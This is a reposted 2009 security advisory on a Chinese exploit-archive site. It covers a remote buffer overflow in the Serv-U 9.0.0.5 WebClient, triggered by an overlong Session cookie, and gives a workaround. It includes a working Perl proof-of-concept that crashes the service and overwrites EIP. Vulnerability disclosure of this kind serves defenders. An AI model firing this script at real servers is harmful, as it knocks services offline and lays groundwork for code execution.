首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow
来源:vfocus.net 作者:Rangos 发布时间:2009-11-04  
-- KC Security PUBLIC ADVISORY -- http://www.rangos.de -- 
11-01-2009


RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow


Background
------------

Serv-U includes a simple, browser-based transfer client perfect
for every business environment. The Web Client is accessed through
a standard web browser and features an unintimidating, familiar interface.
It is a great way for sharing photos and image files with clients and
co-workers due to its configurable thumbnail view that allows remote
images to be quickly viewed without downloading the entire file.
An additional slideshow view offers a fast way to share a collection 
of photos from your latest projects. When using Serv-U, photo sharing 
sites and large email attachments are a thing of the past!


Description
------------

Remote exploitation of a buffer overflow in the Serv-U WebClient
may allow attackers to execute arbitrary code.

The problem lies in the handling of overly long Session Cookies.
When a very long session cookie is sent to the Serv-U WebClient
HTTP Service an overrun occurs and EIP becomes "overwritten".


Detection
------------
KC Security confirmed the vulnerability in the latest version of Serv-U
WebClient which is 9.0.0.5.


Workaround
------------
Disable the WebClient Service and use the Serv-U FTP/SFTP components only.


Proof of concept
------------
The following PERL script will crash the Serv-U.exe service and overwrite
EIP with 0xAAAAAAAA.

---snip---
use IO::Socket;

$|=1;
$a = "A" x 100000;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '80',
                              Proto    => 'tcp');                             

print $sock "POST / HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
."Content-Length: 0\r\n\r\n";

while (<$sock>) {
	print;
}
---snip---


Credit
------------
This vulnerability was discovered by Nikolaos Rangos of KC Security.
Visit us at http://www.rangos.de


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla 1.5.12 Remote Code Exec
·Symantec ConsoleUtilities Acti
·Linux Kernel 'pipe.c' Local Pr
·Xion Audio Player version 1.0
·Flash应用安全规范
·PunBB Extension Attachment ver
·CubeCart 4 suffers from a real
·Mac OS X 10.5.6/10.5.7 ptrace(
·Remote denial of service explo
·CVE-2009-1979 PoC. Working at
·Remote buffer overflow exploit
·Blender .blend Project Arbitra
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved